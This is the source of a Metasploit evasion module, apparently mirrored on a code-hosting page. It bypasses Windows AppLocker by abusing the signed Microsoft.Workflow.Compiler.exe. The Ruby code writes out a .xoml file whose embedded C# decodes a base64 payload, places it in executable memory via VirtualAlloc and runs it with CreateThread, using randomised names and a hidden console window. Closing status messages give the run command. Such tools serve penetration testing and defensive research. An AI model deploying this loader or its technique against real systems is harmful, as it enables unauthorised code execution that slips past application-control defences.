Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/evasion/windows/applocker_evasion_workflow_compiler.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(update_info(info,9'Name' => 'Applocker Evasion - Microsoft Workflow Compiler',10'Description' => %(11This module will assist you in evading Microsoft12Windows Applocker and Software Restriction Policies.13This technique utilises the Microsoft signed binaries14Microsoft.Workflow.Compiler.exe to execute user supplied code.15),16'Author' =>17[18'Nick Tyrer <@NickTyrer>', # module development19'Matt Graeber' # workflow_compiler bypass research20],21'License' => 'MSF_LICENSE',22'Platform' => 'win',23'Arch' => [ARCH_X86, ARCH_X64],24'Targets' => [['Microsoft Windows', {}]],25'References' => [['URL', 'https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb']])26)2728register_options(29[30OptString.new('XOML_FILE', [true, 'Filename for the .xoml file (default: workflow.xoml)', 'workflow.xoml']),31OptString.new('XML_FILE', [true, 'Filename for the .xml file (default: workflow.xml)', 'workflow.xml'])32]33)3435deregister_options('FILENAME')36end3738def build_payload39Rex::Text.encode_base64(payload.encoded)40end4142def obfu43Rex::Text.rand_text_alpha 844end4546def workflow_xoml47esc = build_payload48mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]49<<~HEREDOC50<SequentialWorkflowActivity x:Class="#{mod[0]}" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">51<x:Code><![CDATA[52public class #{mod[1]} : SequentialWorkflowActivity53{54public #{mod[1]}()55{56#{mod[2]}();57}58public static void #{mod[2]}()59{60IntPtr #{mod[3]};61#{mod[3]} = GetConsoleWindow();62ShowWindow(#{mod[3]}, #{mod[4]});63string #{mod[5]} = "#{esc}";64byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});65byte[] #{mod[7]} = #{mod[6]};66IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[12]}, #{mod[9]});67System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);68IntPtr #{mod[10]} = IntPtr.Zero;69WaitForSingleObject(CreateThread(#{mod[10]}, UIntPtr.Zero, #{mod[8]}, #{mod[10]}, 0, ref #{mod[10]}), #{mod[11]});70}71private static Int32 #{mod[12]}=0x1000;72private static IntPtr #{mod[9]}=(IntPtr)0x40;73private static UInt32 #{mod[11]} = 0xFFFFFFFF;74[System.Runtime.InteropServices.DllImport("kernel32")]75private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);76[System.Runtime.InteropServices.DllImport("kernel32")]77private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr #{mod[10]});78[System.Runtime.InteropServices.DllImport("kernel32")]79private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);80[System.Runtime.InteropServices.DllImport("user32.dll")]81static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);82[System.Runtime.InteropServices.DllImport("Kernel32")]83private static extern IntPtr GetConsoleWindow();84const int #{mod[4]} = 0;85}86]]></x:Code>87</SequentialWorkflowActivity>88HEREDOC89end9091def workflow_xml92<<~HEREDOC93<?xml version="1.0" encoding="utf-8"?>94<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">95<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">96<d2p1:string>#{datastore['XOML_FILE']}</d2p1:string>97</files>98<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">99<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />100<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />101<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>102<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />103<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />104<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>105<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>106<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>107<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />108<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />109<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>110<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />111<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>112<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>113<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />114<d2p1:checkTypes>false</d2p1:checkTypes>115<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>116<d2p1:compilerOptions i:nil="true" />117<d2p1:generateCCU>false</d2p1:generateCCU>118<d2p1:languageToUse>CSharp</d2p1:languageToUse>119<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />120<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />121<d2p1:mtInfo i:nil="true" />122<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />123</parameters>124</CompilerInput>125HEREDOC126end127128def file_format_filename(name = '')129name.empty? ? @fname : @fname = name130end131132def create_files133f1 = datastore['XOML_FILE'].empty? ? 'workflow.xoml' : datastore['XOML_FILE']134f1 << '.xoml' unless f1.downcase.end_with?('.xoml')135f2 = datastore['XML_FILE'].empty? ? 'workflow.xml' : datastore['XML_FILE']136f2 << '.xml' unless f2.downcase.end_with?('.xml')137xoml_file = workflow_xoml138xml_file = workflow_xml139file_format_filename(f1)140file_create(xoml_file)141file_format_filename(f2)142file_create(xml_file)143end144145def instructions146print_status "Copy #{datastore['XOML_FILE']} and #{datastore['XML_FILE']} to the target"147if payload.arch.first == ARCH_X86148print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"149else150print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"151end152end153154def run155create_files156instructions157end158end159160161